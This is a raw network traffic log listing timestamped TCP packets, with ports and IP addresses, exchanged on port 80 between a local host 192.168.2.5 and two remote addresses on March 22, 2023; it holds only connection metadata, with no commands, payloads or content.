Mar 22, 2023 05:43:17.314383030 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.314924955 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.314976931 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.314994097 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.315021992 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.315027952 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.315067053 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.315670013 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.315749884 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.315762043 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.315809965 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.315813065 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.315855980 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.316473961 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.316540956 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.331931114 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.331960917 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332072020 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.332114935 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.332492113 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332515955 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332537889 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332562923 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.332600117 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.332892895 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332917929 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332938910 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.332948923 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.332973957 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.333000898 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.333664894 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.333688021 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.333709955 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.333734989 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.333770990 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.334423065 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.334445953 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.334470034 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.334495068 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.334532976 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.335227966 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.335252047 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.335273027 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.335315943 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.335340023 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.336124897 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336148024 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336169958 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336203098 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.336235046 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.336813927 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336838961 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336859941 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.336884022 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.336911917 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.337568998 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.337593079 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.337614059 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.337641001 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.337676048 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.338336945 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.338363886 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.338383913 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.338407993 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.338440895 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.339116096 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339138031 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339155912 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339188099 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.339216948 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.339910984 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339930058 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339951038 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.339986086 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.340012074 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.340667009 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.340687990 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.340707064 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.340738058 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.340764046 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.341459990 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.341485977 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.341507912 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.341536999 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.341566086 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.342201948 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.342221975 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.342242002 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.342272043 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.342305899 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.342997074 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.343019009 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.343039989 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.343060017 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.343097925 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.343996048 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344017029 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344054937 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344069004 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.344089031 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.344125986 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.344551086 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344573021 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344602108 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.344607115 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.344615936 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.344656944 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.345398903 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.345419884 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.345438004 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.345463037 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.345479965 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.346563101 CET	80	49735	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:17.346648932 CET	49735	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:17.353091955 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353123903 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353143930 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353167057 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.353167057 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.353209972 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.353563070 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353581905 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353600025 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353619099 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.353629112 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.353672981 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.353672981 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.354389906 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.354409933 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.354444027 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.354464054 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.354516983 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.354535103 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.354569912 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.354569912 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.355474949 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.355494976 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.355514050 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.355532885 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.355539083 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.355571032 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.355587006 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.356328011 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.356347084 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.356393099 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.356403112 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.356411934 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.356441021 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.356452942 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.356482029 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.357256889 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.357276917 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.357295036 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.357312918 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.357317924 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.357347965 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.357362986 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.358127117 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.358149052 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.358166933 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.358186007 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.358194113 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.358223915 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.358238935 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.358987093 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.359006882 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.359045029 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.359045982 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.359065056 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.359069109 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.359100103 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.359136105 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.359955072 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.359982014 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360004902 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360013962 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360029936 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360035896 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360050917 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360081911 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360774994 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360800028 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360824108 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360831022 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360848904 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.360848904 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360867023 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.360884905 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.361696959 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.361722946 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.361747026 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.361752033 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.361771107 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.361788034 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.361804008 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.361818075 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.362613916 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.362682104 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.362855911 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.362879992 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.362904072 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.362927914 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.362931013 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.362931013 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.362971067 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.362971067 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.363795042 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.363821030 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.363843918 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.363850117 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.363867044 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.363868952 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.363888025 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.363903999 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.364609003 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.364633083 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.364655018 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.364675999 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.364695072 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.364712000 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.364757061 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.365541935 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.365566969 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.365590096 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.365593910 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.365612984 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.365614891 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.365632057 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.365654945 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.366297960 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.366324902 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.366349936 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.366353989 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.366374016 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.366375923 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.366394997 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.366416931 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367121935 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367158890 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367182970 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367185116 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367208004 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367216110 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367216110 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367250919 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367867947 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367892981 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367916107 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367938995 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.367954969 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367954969 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367954969 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.367997885 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.368007898 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368050098 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.368865013 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368890047 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368915081 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368933916 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.368933916 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.368937969 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368961096 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.368964911 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.368978024 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.369004011 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.369817972 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.369843960 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.369868040 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.369870901 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.369889975 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.369891882 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.369906902 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.369934082 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.370528936 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.370601892 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.370784998 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.370846987 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.370851040 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.370914936 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.370919943 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.370970964 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371030092 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371037960 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371092081 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371634007 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371680975 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371697903 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371723890 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371726990 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371771097 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371773005 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371813059 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.371819019 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.371865034 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.372498989 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.372545004 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.372553110 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.372592926 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.372596025 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.372638941 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.372674942 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.372685909 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.372695923 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.372740030 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.373409986 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.373455048 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.373467922 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.373506069 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.373507023 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.373550892 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.373553038 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.373595953 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.373596907 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.373652935 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374342918 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374388933 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374417067 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374437094 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374439955 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374485970 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374857903 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374905109 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374924898 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374949932 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.374949932 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.374999046 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375004053 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.375045061 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375050068 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.375139952 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.375792980 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375854015 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.375891924 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375938892 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375941038 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.375987053 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.375988007 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376033068 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.376043081 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.376079082 CET	80	49714	172.67.70.22	192.168.2.5
